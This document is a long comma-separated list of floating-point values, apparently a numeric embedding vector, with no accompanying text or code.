-0.009633202105760574, -0.025586366653442383, -0.02168929949402809, -0.018317678943276405, -0.027775730937719345, 0.008341477252542973, 0.002588922856375575, -0.004769164603203535, 0.004977154079824686, 0.018711764365434647, -0.005900335963815451, 0.0031015989370644093, 0.0029136785306036472, -0.026564283296465874, -0.01329673733562231, 0.0009551100665703416, -0.010873841121792793, -0.028899604454636574, 0.023221854120492935, -0.011370097286999226, 0.009618605487048626, -0.01954372227191925, 0.02300291880965233, 0.011924736201763153, 0.007794135715812445, 0.009129648096859455, -0.01580720767378807, 0.022243939340114594, 0.015792611986398697, -0.05706942081451416, 0.018390657380223274, -0.0110781816765666, -0.014033823274075985, -0.011800671927630901, 0.00356136541813612, 0.00463415402919054, 0.011508757248520851, -0.02300291880965233, 0.003970046993345022, 0.010311904363334179, -0.02449168637394905, -0.014478994533419609, -0.002136454451829195, -0.03068028762936592, -0.012099885381758213, 0.02760058268904686, -0.02028810605406761, 0.028636882081627846, -0.016799720004200935, -0.0017314220312982798, 0.018580403178930283, -0.0062250918708741665, 0.011552544310688972, 0.018478231504559517, 0.008232008665800095, 0.011180352419614792, -0.039262596517801285, -0.025527983903884888, -0.009552924893796444, -0.0028406998608261347, -0.005491654854267836, -0.021090872585773468, -0.02168929949402809, -0.022798577323555946, 0.003853280795738101, 0.026403730735182762, 0.009100456722080708, -0.009261010214686394, -0.019091254100203514, 0.004958909470587969, 0.010910330340266228, -0.029848329722881317, 0.007064348086714745, -0.03698565438389778, 0.002388231223449111, 0.024783600121736526, -0.00956022273749113, 0.0397004671394825, -0.003791248658671975, -0.012267736718058586, 0.028607690706849098, 0.029381265863776207, 0.04040106385946274, -0.03079705312848091, -0.01534014381468296, 0.0021090873051434755, -0.009355882182717323, -0.0007224901346489787, 0.01716461405158043, -0.00988862756639719, -0.00410870648920536, 0.019135041162371635, 0.007969285361468792, 0.0003580522316042334, -0.006710400804877281, -0.013836780562996864, 0.007896305993199348, 0.001711352844722569, -0.002588922856375575, 0.02393704652786255, -0.010895734652876854, -0.033073991537094116, 0.028199007734656334, 0.053391288965940475, 0.0019777254201471806, -0.006684858351945877, 0.0031508596148341894, -0.007538710255175829, 0.001510661211796105, 0.009304797276854515, 0.008436349220573902, 0.015705037862062454, -0.02136819250881672, 0.015909379348158836, -0.03678131476044655, 0.04688158258795738, -0.0332491397857666, 0.012953736819326878, -0.014362228102982044, -0.00542962271720171, -0.024710621684789658, 0.0022897098679095507, 0.008180923759937286, -0.005400431342422962, -0.005185144022107124, -0.01131171453744173, -0.015456910245120525, -0.001504275482147932, -0.013522971421480179, -0.0031818756833672523, 0.00536394165828824, -0.001559921889565885, 0.022667216137051582, -0.005575580522418022, 0.015208781696856022, -0.008458242751657963, -0.012712907046079636, 0.01954372227191925, -0.03520497307181358, -0.009458052925765514, 0.0012880758149549365, 0.014880377799272537, -0.01382218487560749, -0.0006814395310357213, -0.008137136697769165, -0.018551211804151535, 0.014391419477760792, -0.04285315051674843, 0.00048211621469818056, -0.01450088806450367, -0.017763040959835052, 0.013990036211907864, -0.01849282719194889, -0.02171849086880684, -0.013501077890396118, -0.02449168637394905, 0.01809874176979065, -0.0004830284451600164, -0.0040868129581213, 0.009574818424880505, 0.07881710678339005, -0.009574818424880505, 0.01650780439376831, -0.011961225420236588, -0.007794135715812445, -0.0024922259617596865, 0.017690060660243034, 0.005196090787649155, 0.03091382049024105, -0.026286963373422623, 0.010173244401812553, 0.018551211804151535, -0.008363370783627033, 0.011829863302409649, 0.017427338287234306, 0.0338621623814106, -0.03453356772661209, -0.008772051893174648, 0.03415407985448837, -0.007874412462115288, 0.015938570722937584, 0.0009751792531460524, 0.00650241132825613, -0.0004495038010645658, 0.03339510038495064, -0.013369716703891754, -0.008939903229475021, -0.037744637578725815, -0.03173118084669113, -0.01417248323559761, 0.015135803259909153, 0.006119272671639919, -0.010246223770081997, -0.02227313071489334, 0.006498762406408787, 0.006287123542279005, 0.021120065823197365, 0.015617463737726212, -0.008713669143617153, -0.023221854120492935, -0.009239115752279758, -0.02316347137093544, -0.019675085321068764, 0.013690822757780552, -0.007119081914424896, 0.010457862168550491, 0.007546008098870516, 0.005648558959364891, -0.02647670917212963, 0.018244700506329536, -0.005199739709496498, -0.029206115752458572, -0.003039567032828927, 0.00000802481736172922, -0.0004143827536609024, 0.000770838581956923, -0.02573232538998127, -0.011304416693747044, -0.012136374600231647, -0.0052362289279699326, 0.010005393996834755, 0.02475440874695778, -0.016245080158114433, -0.00035189464688301086, -0.0009660568903200328, -0.011333608068525791, -0.014011929742991924, -0.0006485991179943085, -0.035759612917900085, 0.012676417827606201, 0.003220189595595002, 0.0014367701951414347, 0.012472077272832394, 0.004973505157977343, 0.002120034070685506, -0.02094491571187973, -0.01239909790456295, 0.010100265964865685, -0.036693740636110306, -0.02456466481089592, 0.006681209430098534, 0.015019036829471588, -0.0025962209329009056, 0.014004631899297237, -0.009465350769460201, 0.04273638501763344, -0.019514530897140503, 0.003977344837039709, -0.011435777880251408, -0.006560794077813625, -0.026637261733412743, -0.007750348653644323, 0.01818631775677204, 0.005750729702413082, 0.006772432941943407, 0.02939586155116558, 0.005072026513516903, -0.020039979368448257, -0.011975821107625961, -0.020302701741456985, 0.005513548385351896, 0.0166245698928833, 0.007684667594730854, 0.0010043707443401217, -0.019762659445405006, 0.018813934177160263, 0.003970046993345022, 0.012099885381758213, -0.015383930876851082, -0.007837923243641853, -0.022900747135281563, -0.0063783470541238785, 0.002118209609761834, -0.00597696378827095, 0.001704967231489718, 0.013690822757780552, 0.0004501879739109427, -0.017719252035021782, -0.022988323122262955, -0.027615178376436234, -0.007086241617798805, -0.001484206411987543, 0.003904365934431553, -0.03219824656844139, -0.00037880559102632105, 0.004842143505811691, 0.023484578356146812, -0.0256593469530344, 0.00891800969839096, 0.00938507355749607, 0.022404491901397705, 0.01131171453744173, 0.011545246466994286, -0.002612641081213951, -0.009297499433159828, -0.019937807694077492, 0.01674133725464344, 0.012844269163906574, -0.006881901063024998, 0.020507043227553368, -0.017150018364191055, 0.024433301761746407, -0.005145005416125059, 0.010290010832250118, 0.007918199524283409, 0.0009706180426292121, 0.003008550964295864, 0.0023864067625254393, 0.004787409212440252, 0.005480708088725805, 0.012070694006979465, -0.036343444138765335, 0.005327452439814806, 0.003809493500739336, 0.011070883832871914, -0.013055907562375069, 0.01942695677280426, -0.008881520479917526, -0.002908205147832632, 0.004977154079824686, -0.0010408601956441998, 0.009720776230096817, 0.010851947590708733, -0.034008122980594635, -0.0110781816765666, 0.042181745171546936, -0.013479184359312057, -0.017500316724181175, -0.007082592695951462, -0.005199739709496498, 0.008925307542085648, -0.010662202723324299, -0.024199770763516426, 0.001165836350992322, 0.00544056948274374, 0.034504376351833344, -0.00157907884567976, -0.010603819973766804, 0.03943774476647377, -0.029643988236784935, 0.007126379758119583, -0.010954118333756924, 0.022492066025733948, -0.0009090421954169869, -0.005590176209807396, -0.0018281189259141684, -0.00986673403531313, 0.008188221603631973, -0.05155222490429878, 0.011924736201763153, 0.013917057774960995, 0.030388372018933296, -0.009034775197505951, -0.007341667544096708, 0.012318821623921394, -0.026418326422572136, -0.016551591455936432, -0.021849852055311203, 0.006571740843355656, 0.002463034586980939, -0.011289820075035095, -0.03710242360830307, -0.01026081945747137, -0.0031818756833672523, -0.0012360784457996488, -0.04793247580528259, -0.015821803361177444, 0.015705037862062454, -0.0068417624570429325, -0.001592762302607298, 0.0019886724185198545, -0.004659696482121944, -0.0014741717604920268, -0.0064914645627141, 0.047319453209638596, 0.012559651397168636, -0.02514849416911602, -0.028563901782035828, -0.00595507025718689, -0.0021401033736765385, -0.0019485339289531112, 0.005681399721652269, -0.006735943257808685, 0.019441552460193634, -0.01512120757251978, -0.005385835655033588, 0.03783221170306206, -0.038474421948194504, 0.0011348203988745809, 0.0005592000670731068, -0.015092016197741032, -0.0071847629733383656, 0.0027786679565906525, 0.006699454039335251, -0.0005341136129572988, -0.02358674816787243, -0.00560477189719677, 0.012939141131937504, 0.007954689674079418, 0.0022769386414438486, 0.01558827143162489, 0.010924926027655602, -0.015004441142082214, -0.011216841638088226, 0.0010134930489584804, -0.00018940279551316053, -0.0005870232125744224, 0.008859626017510891, 0.001484206411987543, 0.004874983802437782, -0.018463635817170143, 0.010450564324855804, 0.00003743014167412184, -0.019047467038035393, -0.005064728669822216, -0.01830308325588703, -0.007462082430720329, -0.03266531229019165, -0.019937807694077492, -0.013063205406069756, 0.045684728771448135, -0.01442061085253954, -0.014260057359933853, 0.02600964531302452, -0.027162710204720497, 0.013136183843016624, -0.023572152480483055, -0.01844904012978077, 0.01041407510638237, 0.007750348653644323, 0.01487307995557785, -0.006535251624882221, 0.003590557025745511, -0.004911473486572504, 0.0025414866395294666, 0.006392942741513252, 0.006538900546729565, -0.010647607035934925, -0.014807398431003094, 0.009458052925765514, -0.02160172536969185, 0.022097980603575706, 0.02241908758878708, -0.04153953492641449, 0.0065133580937981606, -0.01732516661286354, -0.0355844646692276, -0.007188411895185709, -0.020682191476225853, -0.02257964015007019, 0.0035887325648218393, -0.0018518370343372226, 0.0022039597388356924, -0.03894148766994476, 0.022360704839229584, 0.0025159441865980625, -0.02332402393221855, 0.038445230573415756, 0.01884312555193901, -0.006527953781187534, 0.007969285361468792, 0.024710621684789658, -0.00536394165828824, -0.004521036520600319, -0.000532289152033627, 0.003683604998514056, -0.021236831322312355, 0.01023892592638731, 0.015325548127293587, 0.00854581780731678, -0.0028297530952841043, -0.01380029134452343, -0.025250665843486786, -0.005787218920886517, -0.003134439466521144, -0.021003298461437225, -0.02203959785401821, 0.0045392815954983234, -0.03427084535360336, 0.0009660568903200328, 0.002375459996983409, -0.03465033322572708, 0.00749492272734642, -0.031789567321538925, -0.00015462383453268558, -0.01697486825287342, 0.010144053027033806, -0.009939712472259998, -0.0010125808184966445, -0.0006171269924379885, 0.02335321716964245, 0.013223758898675442, 0.034358419477939606, -0.008494731970131397, -0.015573675744235516, -0.006367400288581848, 0.021266022697091103, -0.005728835705667734, -0.00951643567532301, 0.014559270814061165, -0.04644370824098587, 0.02615560218691826, -0.0007138238870538771, -0.0014121397398412228, 0.019602105021476746, 0.001209623645991087, 0.006506060250103474, -0.012019608169794083, -0.0005377625348046422, -0.04734864458441734, -0.008939903229475021, -0.0023663376923650503, 0.012442885898053646, -0.0021273321472108364, 0.01856580749154091, 0.01739814691245556, 0.004254664294421673, 0.01856580749154091, 0.010669500567018986, -0.03105977736413479, 0.01090303249657154, -0.009531031362712383, -0.028782838955521584, 0.01646401733160019, 0.005009994842112064, -0.033657822757959366, -0.004926069173961878, 0.02152874693274498, 0.0122604388743639, -0.005006345920264721, 0.0017058794619515538, -0.0024155983701348305, 0.018113337457180023, -0.0008301338530145586, -0.006243336480110884, -0.00437143025919795, 0.030125649645924568, -0.018390657380223274, -0.024652238935232162, 0.02386406809091568, -0.009998096153140068, 0.010399479418992996, -0.01312158815562725, 0.007443837821483612, 0.002858944470062852, -0.0036452910862863064, -0.020609213039278984, -0.004528334364295006, -0.011202245950698853, -0.0001229236659128219, 0.017412742599844933, 0.029439648613333702, 0.02001078799366951, 0.04448787868022919, 0.006356453523039818, 0.007440188899636269, -0.005488005932420492, 0.010465160012245178, -0.02717730589210987, -0.007764944341033697, -0.0038277381099760532, -0.01504822913557291, -0.016872698441147804, 0.021324405446648598, 0.0013510200660675764, 0.0044517070055007935, -0.019806446507573128, -0.018974488601088524, 0.02802385948598385, -0.02554257959127426, -0.004583068657666445, -0.0001704739115666598, -0.006739592179656029, -0.022915342822670937, -0.018522020429372787, 0.008801243267953396, -0.006845411378890276, 0.042210936546325684, 0.0119539275765419, -0.00926830805838108, 0.011282522231340408, -0.0026308856904506683, -0.0038751743268221617, -0.017763040959835052, -0.016376443207263947, -0.015573675744235516, -0.007162869442254305, 0.0027111624367535114, -0.01658078283071518, -0.002213082043454051, -0.007779540028423071, -0.010647607035934925, 0.0036817805375903845, -0.01407031249254942, 0.02129521407186985, 0.00764817837625742, -0.015427718870341778, -0.020229723304510117, -0.012917247600853443, 0.011691204272210598, 0.002010565949603915, -0.005181494634598494, 0.003616099478676915, -0.009757265448570251, -0.0001692195946816355, 0.0018253822345286608, -0.008509328588843346, -0.020580021664500237, -0.01105628814548254, -0.008093348704278469, 0.015135803259909153, -0.0009072177344933152, 0.02989211678504944, 0.013143481686711311, -0.00010610433673718944, -0.0009459877037443221, 0.0030815298669040203, -0.00854581780731678, 0.006374698132276535, -0.013384312391281128, 0.008866923861205578, -0.013413503766059875, 0.01678512431681156, 0.008779349736869335, 0.0043093981221318245, 0.006622826214879751, 0.0048275478184223175, 0.0008429051376879215, -0.009304797276854515, -0.0071592205204069614, 0.014902271330356598, -0.009180733002722263, 0.026491304859519005, -0.000027580856112763286, 0.003886121092364192, -0.01103439461439848, -0.020039979368448257, -0.01646401733160019, -0.004393323790282011, 0.01611371897161007, 0.0017624379834160209, 0.016303464770317078, -0.004057621117681265, -0.005298261065036058, 0.0054661124013364315, 0.009822946973145008, -0.0112314373254776, -0.008502030745148659, 0.010202436707913876, -0.008458242751657963, 0.004579419735819101, -0.015427718870341778, -0.00031426496570929885, 0.00562666542828083, 0.02440411038696766, 0.003190997987985611, 0.015237974002957344, 0.020609213039278984, 0.006677560042589903, 0.0010235277004539967, 0.004769164603203535, -0.00417438754811883, -0.004302100278437138, -0.010428670793771744, 0.016682954505085945, 0.0020470554009079933, -0.024462493136525154, 0.0032001205254346132, 0.029381265863776207, -0.01193203404545784, 0.00782332755625248, -0.004918771330267191, -0.013457290828227997, -0.0005409553414210677, -0.009684287011623383, 0.009333988651633263, 0.006031698081642389, -0.0013564934488385916, -0.019879424944519997, -0.005338399205356836, 0.0023407950066030025, 0.010603819973766804, 0.009830244816839695, -0.01853661611676216, -0.006856358144432306, 0.0072249011136591434, 0.02335321716964245, -0.018434444442391396, -0.0000300182327919174, -0.024360323324799538, 0.0022532204166054726, 0.007338018622249365, -0.004725377541035414, -0.0028188060969114304, 0.013238354586064816, -0.009085861034691334, 0.0326361209154129, -0.014559270814061165, 0.010866543278098106, -0.012012310326099396, 0.0019065712112933397, -0.008728264831006527, -0.002915502991527319, 0.020857341587543488, -0.0029501679819077253, -0.012384502217173576, 0.00544056948274374, -0.006046293769031763, -0.016712145879864693, 0.004039376508444548, 0.015559080056846142, 0.001899273251183331, 0.007469380274415016, 0.008903414011001587, -0.010771671310067177, -0.005188792943954468, -0.0177922323346138, 0.0003842790029011667, 0.0018646083772182465, 0.005305558908730745, -0.003705498529598117, 0.013085098937153816, 0.02047785185277462, 0.007691965438425541, -0.0004180317046120763, 0.015821803361177444, -0.006367400288581848, -0.008728264831006527, -0.0025542580988258123, -0.019368574023246765, 0.006392942741513252, 0.002504997421056032, -0.007341667544096708, 0.007367209997028112, -0.004178036469966173, 0.0023900556843727827, 0.011494161561131477, 0.0009441632428206503, -0.007662774063646793, 0.004794707056134939, 0.02927909418940544, 0.01212907675653696, -0.011019798927009106, -0.012165565975010395, -0.017383551225066185, -0.003948152996599674, 0.017412742599844933, -0.02339700423181057, -0.002780492417514324, -0.003190997987985611, 0.019689681008458138, 0.009136945940554142, -0.034008122980594635, 0.026330750435590744, 0.0011877299984917045, -0.004378728102892637, -0.025367431342601776, -0.006881901063024998, -0.006126570515334606, 0.0087428605183959, 0.014661440625786781, 0.013931653462350368, 0.006604581605643034, -0.006995018105953932, -0.009355882182717323, -0.0010609292658045888, 0.02078436315059662, -0.030738670378923416, 0.010173244401812553, -0.0052106864750385284, 0.005699644330888987, 0.01498984545469284, -0.004718079697340727, -0.0025013484992086887, -0.007925497367978096, -0.021849852055311203, -0.006779730785638094, -0.003690902842208743, -0.012340715155005455, -0.02694377303123474, 0.012209353037178516, -0.016945676878094673, 0.005309207830578089, 0.002200310816988349, 0.008969094604253769, 0.009319392964243889, 0.0016903714276850224, -0.018594998866319656, -0.00463415402919054, 0.006447677034884691, 0.004229121375828981, 0.006075485143810511, 0.00703515624627471, 0.009253712370991707, -0.0002882662520278245, 0.039642084389925, -0.006093729753047228, 0.005630314350128174, -0.0256593469530344, -0.012034203857183456, 0.00026933738263323903, -0.01056733075529337, -0.00918803084641695, -0.020098362118005753, -0.027002155780792236, 0.015661250799894333, 0.013712716288864613, -0.016682954505085945, 0.00579086784273386, 0.028797434642910957, -0.011413884349167347, 0.017529508098959923, -0.023455386981368065, 0.006998667027801275, 0.004521036520600319, -0.019952403381466866, -0.007837923243641853, 0.009304797276854515, 0.017354357987642288, 0.008202817291021347, 0.025279857218265533, 0.006885549984872341, -0.013960844837129116, 0.00821741297841072, 0.003973695915192366, -0.003097950015217066, -0.025177685543894768, 0.0024575612042099237, 0.008932605385780334, 0.01580720767378807, 0.006951230578124523, -0.007553305942565203, -0.015004441142082214, -0.009764563292264938, -0.009282903745770454, -0.012873460538685322, -0.0016529698623344302, 0.009859436191618443, -0.005031888373196125, 0.003019497962668538, -0.017150018364191055, 0.012267736718058586, -0.017733847722411156, -0.0072212521918118, -0.008407157845795155, -0.0019229913596063852, -0.002307954477146268, -0.0028698912356048822, -0.005469761323183775, -0.01790899783372879, 0.0063455067574977875, 0.02180606499314308, 0.022316917777061462, -0.004926069173961878, -0.004999048076570034, -0.05450056865811348, -0.023426195606589317, 0.019251808524131775, -0.015734229236841202, 0.004612260032445192, 0.01627427339553833, -0.0075679016299545765, -0.008027668111026287, -0.0054661124013364315, 0.0022349758073687553, 0.007275986485183239, 0.011815267615020275, -0.0003710516029968858, 0.016128314658999443, 0.015194186009466648, 0.02328023687005043, -0.004057621117681265, 0.020623808726668358, 0.001986847957596183, -0.008297689259052277, 0.027308667078614235, 0.0012616210151463747, 0.01415058970451355, 0.03009645827114582, -0.0041342489421367645, -0.028972584754228592, 0.009290201589465141, -0.004568472970277071, -0.01985023356974125, 0.008005774579942226, 0.019923212006688118, 0.008764754049479961, -0.008377966471016407, -0.022915342822670937, -0.00834877509623766, 0.0012251315638422966, 0.013355120085179806, 0.02865147776901722, -0.0036799560766667128, -0.000023532813429483213, -0.0007252268260344863, 0.02398083359003067, -0.020039979368448257, -0.005126760806888342, -0.013727311976253986, 0.03138088434934616, 0.005809112451970577, -0.01716461405158043, -0.002882662694901228, -0.007458433508872986, 0.004130600020289421, -0.003446423914283514, 0.0014614005340263247, -0.02164551243185997, 0.010297308675944805, -0.018361466005444527, 0.014800100587308407, -0.018872318789362907, -0.014135994017124176, 0.01120954379439354, -0.009698882699012756, -0.011224139481782913, 0.014530079439282417, 0.007589795161038637, -0.008684476837515831, 0.003107072552666068, 0.012778587639331818, 0.00621779402717948, 0.011399288661777973, 0.015092016197741032, 0.023017514497041702, 0.0074803270399570465, 0.007786837872117758, -0.017222996801137924, -0.003019497962668538, -0.008078753016889095, 0.01155984215438366, 0.01907665841281414, 0.000363525643479079, 0.013384312391281128, 0.015442314557731152, -0.003661711234599352, -0.015617463737726212, 0.012917247600853443, -0.02764436975121498, 0.01463954709470272, -0.009312095120549202, -0.005163250025361776, 0.002866242313757539, 0.04947962611913681, -0.014632249251008034, -0.0128296734765172, 0.0072249011136591434, 0.002751300809904933, -0.01912044547498226, 0.0027859658002853394, -0.014551972970366478, 0.004951611626893282, -0.009275605902075768, -0.032402586191892624, -0.006371049210429192, -0.0009578467579558492, -0.006827166769653559, 0.009450755082070827, -0.00773575296625495, -0.0071592205204069614, -0.03958370164036751, -0.030271606519818306, -0.01802576333284378, 0.013026716187596321, 0.02725028432905674, -0.007750348653644323, -0.0043422384187579155, 0.0007726630428805947, 0.0005742519279010594, -0.016682954505085945, 0.008735562674701214, -0.014041121117770672, 0.007356263231486082, -0.0005446043214760721, 0.006425783503800631, -0.007808731868863106, -0.002826104173436761, 0.02729407139122486, 0.003402636619284749, 0.013304035179316998, -0.011537948623299599, 0.0026673751417547464, -0.0018937998684123158, 0.0026673751417547464, -0.018273891881108284, -0.011275224387645721, -0.019952403381466866, 0.012034203857183456, -0.017617082223296165, -0.012705609202384949, -0.005152303259819746, 0.0029665883630514145, -0.011632820591330528, -0.014106802642345428, -0.017894402146339417, -0.014668739400804043, 0.00006944389315322042, 0.005327452439814806, -0.004382377024739981, -0.007155571598559618, 0.005309207830578089, 0.012333417311310768, 0.005334750283509493, -0.006425783503800631, -0.019280999898910522, -0.00811524223536253, -0.021032489836215973, -0.007257741875946522, -0.0071592205204069614, 0.009976201690733433, -0.004612260032445192, -0.005145005416125059, 0.004615908954292536, 0.010173244401812553, -0.00560477189719677, 0.009998096153140068, -0.029716968536376953, -0.03251935541629791, -0.006735943257808685, 0.014303845353424549, 0.022871555760502815, 0.014216270297765732, 0.001954007428139448, 0.009042073041200638, -0.010581926442682743, -0.01907665841281414, -0.004225472453981638, -0.014734419994056225, -0.009545627050101757, 0.03654778376221657, -0.009618605487048626, -0.0036945517640560865, 0.024652238935232162, 0.01569044217467308, -0.005630314350128174, -0.004057621117681265, -0.009976201690733433, -0.04621017724275589, 0.003714621067047119, 0.0110781816765666, 0.005338399205356836, -0.01786521077156067, 0.005250824615359306, -0.001285339123569429, -0.01006377674639225, 0.01646401733160019, 0.009465350769460201, -0.010370288044214249, -0.015237974002957344, -0.0002499523980077356, -0.004688887856900692, -0.013479184359312057, 0.022375300526618958, 0.03286965191364288, -0.00650241132825613, 0.01650780439376831, 0.003515753662213683, 0.012048800475895405, 0.002236800268292427, -0.003780301893129945, 0.020536234602332115, 0.003842333797365427, 0.0309430118650198, -0.0032238385174423456, 0.01716461405158043, -0.00021916445984970778, -0.021893640980124474, 0.000014189530702424236, 0.009947010315954685, 0.011275224387645721, 0.039262596517801285, 0.0015571851981803775, -0.0016301639843732119, 0.003940855152904987, 0.0054989526979625225, -0.00854581780731678, -0.024477090686559677, 0.005473410245031118, 0.006549847312271595, 0.01704784855246544, 0.011508757248520851, -0.020609213039278984, 0.0002709337859414518, 0.02351376973092556, 0.0038459827192127705, 0.02837415784597397, -0.013442695140838623, -0.014515483751893044, -0.005181494634598494, 0.016799720004200935, 0.003878823248669505, 0.024112196639180183, 0.014041121117770672, -0.030884629115462303, 0.03149764984846115, 0.0008857802022248507, -0.0144425043836236, -0.0015754298074170947, -0.009881329722702503, 0.0017268608789891005, 0.008407157845795155, 0.0012169214896857738, -0.01558827143162489, -0.008122540079057217, -0.02790709398686886, -0.004389674868434668, 0.0029300989117473364, 0.02671024017035961, 0.011289820075035095, -0.014208972454071045, 0.010749777778983116, -0.02323644980788231, -0.014026525430381298, -0.03251935541629791, -0.013610546477138996, -0.032373394817113876, 0.027921689674258232, 0.0245208777487278, -0.026681048795580864, -0.02087193727493286, 0.01728137955069542, -0.001661179936490953, 0.00428385566920042, 0.009939712472259998, 0.005951421335339546, -0.04048863798379898, -0.014260057359933853, -0.015354739502072334, -0.003327833255752921, -0.0017469300655648112, -0.011610927060246468, 0.006951230578124523, -0.018857721239328384, 0.006652017589658499, 0.006874603219330311, 0.008786647580564022, -0.015062824822962284, -0.023426195606589317, 0.006035347003489733, -0.0361974835395813, 0.010895734652876854, -0.01938316971063614, -0.012683715671300888, -0.01912044547498226, -0.008801243267953396, -0.001385684940032661, 0.004316695965826511, 0.024360323324799538, -0.013574057258665562, -0.00764817837625742, -0.004163440782576799, 0.021280618384480476, 0.004225472453981638, 0.025323644280433655, -0.003415407845750451, 0.025440409779548645, -0.009925116784870625, 0.011917438358068466, -0.024696025997400284, 0.011968523263931274, -0.005831005983054638, 0.0050026969984173775, -0.008830434642732143, -0.014033823274075985, -0.012639928609132767, 0.002143752295523882, 0.015223377384245396, 0.006827166769653559, -0.006615528371185064, 0.018828529864549637, 0.014457100071012974, -0.0320814810693264, 0.0002681970945559442, 0.02017134055495262, -0.0045976643450558186, -0.020229723304510117, 0.010290010832250118, -0.0034062855411320925, -0.0013756504049524665, 0.0008041351684369147, 0.007954689674079418, 0.005768974311649799, -0.01849282719194889, -0.023805685341358185, -0.011297117918729782, -0.01377839781343937, -0.03707323223352432, 0.022097980603575706, -0.005893038120120764, 0.023411599919199944, -0.0004134705231990665, -0.0016566187841817737, 0.014800100587308407, 0.014121398329734802, 0.01327484380453825, 0.008166328072547913, -0.002607167698442936, 0.010180543176829815, 0.007487624883651733, 0.0002030863252002746, -0.012005012482404709, -0.031234927475452423, 0.02876824326813221, -0.0018034885870292783, 0.0001488083362346515, -0.014179781079292297, -0.004050323273986578, 0.011545246466994286, 0.011968523263931274, -0.011815267615020275, -0.0037000251468271017, -0.027746539562940598, -0.016478613018989563, 0.01033379789441824, 0.007691965438425541, 0.015135803259909153, 0.009020179510116577, 0.011063585989177227, 0.007896305993199348, -0.014902271330356598, -0.02592206932604313, -0.0023645132314413786, -0.0010034585138782859, 0.005174196790903807, -0.007721157278865576, -0.01795278489589691, -0.017690060660243034, -0.016201293095946312, 0.015310952439904213, 0.004791058134287596, 0.015223377384245396, -0.03485467657446861, -0.011362799443304539, 0.002300656633451581, 0.0011202245950698853, -0.011939331889152527, -0.010523542761802673, 0.00036694653681479394, -0.001203238032758236, -0.014690632931888103, -0.003915312699973583, 0.022360704839229584, 0.005385835655033588, 0.004933367017656565, 0.0031928224489092827, -0.0012616210151463747, 0.011742289178073406, 0.020857341587543488, 0.027308667078614235, -0.012493970803916454, -0.010494351387023926, -0.00577992107719183, -0.009990797378122807, -0.006009804084897041, -0.013727311976253986, 0.02650590054690838, 0.016186697408556938, 0.02020053192973137, -0.03359944000840187, -0.028388753533363342, 0.0014048418961465359, 0.004765515681356192, 0.04352455586194992, -0.021514151245355606, 0.020069170743227005, -0.019937807694077492, 0.005831005983054638, 0.005612069740891457, -0.0017642625607550144, -0.013406205922365189, -0.004612260032445192, -0.02748381718993187, -0.010669500567018986, -0.014384121634066105, -0.012056098319590092, -0.016989463940262794, -0.019981594756245613, 0.0045721218921244144, -0.016799720004200935, 0.0027421785052865744, -0.02292993851006031, 0.009998096153140068, 0.001397544052451849, 0.0015617463504895568, -0.005590176209807396, 0.0034646685235202312, 0.004648749716579914, 0.019295595586299896, -0.026608070358633995, -0.002844348782673478, -0.03222743794322014, -0.017617082223296165, 0.011807969771325588, 0.02199581079185009, 0.0112314373254776, 0.0002786878030747175, -0.0183760616928339, -0.00756060378625989, 0.004053972195833921, 0.010049181059002876, 0.017383551225066185, 0.008998285979032516, -0.011326310224831104, -0.011165756732225418, 0.0008990076021291316, -0.02008376643061638, -0.012625332921743393, 0.012187459506094456, -0.017544103786349297, -0.027658965438604355, 0.0033570248633623123, -0.008560413494706154, 0.0011074532521888614, 0.009764563292264938, 0.0019339382415637374, -0.015398526564240456, 0.010195138864219189, 0.02802385948598385, 0.010815458372235298, 0.005301909986883402, 0.0002882662520278245, -0.010669500567018986, 0.018317678943276405, -0.001341897645033896, -0.006301719229668379, 0.012391800060868263, 0.003285870421677828, -0.021236831322312355, -0.00001699037784419488, 0.0034263546112924814, -0.0030067265033721924, 0.015792611986398697, 0.024550069123506546, 0.0057616764679551125, 0.0035631898790597916, 0.008246604353189468, -0.008027668111026287, 0.007111784070730209, 0.015529888682067394, -0.01412869617342949, -0.012099885381758213, 0.008494731970131397, -0.003253030125051737, 0.0006285299314185977, -0.010596522130072117, -0.00035828028921969235, 0.01103439461439848, 0.021557938307523727, 0.02472521737217903, 0.005593825131654739, -0.01938316971063614, -0.007677369751036167, 0.023309428244829178, -0.000915427808649838, -0.023878663778305054, -0.002300656633451581, -0.00048895797226578, 0.02818441204726696, 0.0031107214745134115, -0.00008911395707400516, 0.0014641372254118323, 0.002393704606220126, -0.002318901475518942, -0.033920545130968094, 0.012209353037178516, -0.005644910037517548, 0.007976583205163479, 0.005020941607654095, 0.004885930567979813, -0.004623206797987223, 0.01814253069460392, 0.019558317959308624, 0.008480136282742023, -0.006184953264892101, 0.011326310224831104, 0.02078436315059662, 0.0019467094680294394, -0.008268497884273529, 0.004842143505811691, -0.005462463013827801, -0.025834495201706886, 0.007874412462115288, -0.02549879252910614, -0.00811524223536253, 0.007465731352567673, -0.006998667027801275, -0.001153977238573134, -0.0013318631099537015, 0.04822439327836037, 0.008472838439047337, -0.010297308675944805, -0.0009332164190709591, 0.007454784587025642, 0.00613021943718195, -0.009749967604875565, 0.021791469305753708, 0.006469570565968752, 0.009319392964243889, 0.010129457339644432, -0.003809493500739336, -0.0005204300978220999, 0.009458052925765514, 0.01142848003655672, -0.01068409625440836, 0.0050355372950434685, 0.0034993335139006376, 0.011362799443304539, 0.016595378518104553, 0.01529635675251484, 0.011596331372857094, 0.0017104406142607331, -0.005659506190568209, -0.017237592488527298, -0.01142848003655672, 0.006298070307821035, -0.0034938601311296225, 0.002417422831058502, -0.016069931909441948, 0.009414264932274818, -0.012187459506094456, -0.008494731970131397, 0.00704610301181674, -0.033307526260614395, -0.008881520479917526, 0.006283474620431662, 0.0013555812183767557, -0.005228931084275246, 0.0004187158774584532, -0.004586717579513788, 0.008866923861205578, 0.015529888682067394, 0.015632059425115585, -0.00839256215840578, 0.007677369751036167, 0.01177877839654684, 0.000870728341396898, -0.00044038143823854625, -0.000006517491328850156, -0.01954372227191925, 0.007323422469198704, -0.0033497270196676254, -0.01442061085253954, -0.013763802126049995, 0.004867685958743095, -0.02900177612900734, -0.011859054677188396, 0.012493970803916454, 0.01173499133437872, 0.010180543176829815, -0.002519593108445406, 0.018346870318055153, 0.014610355719923973, 0.02059461735188961, -0.018580403178930283, 0.0024739813525229692, -0.013902461156249046, 0.0019193424377590418, -0.023367812857031822, -0.0005938649992458522, -0.009961606003344059, -0.009370477870106697, -0.023878663778305054, -0.013282141648232937, -0.001097418717108667, 0.010114861652255058, -0.0040466743521392345, 0.007119081914424896, -0.010290010832250118, 0.00036877099773846567, 0.0025870983954519033, 0.007611688692122698, -0.013763802126049995, -0.008436349220573902, -0.006659315433353186, -0.0005564633756875992, 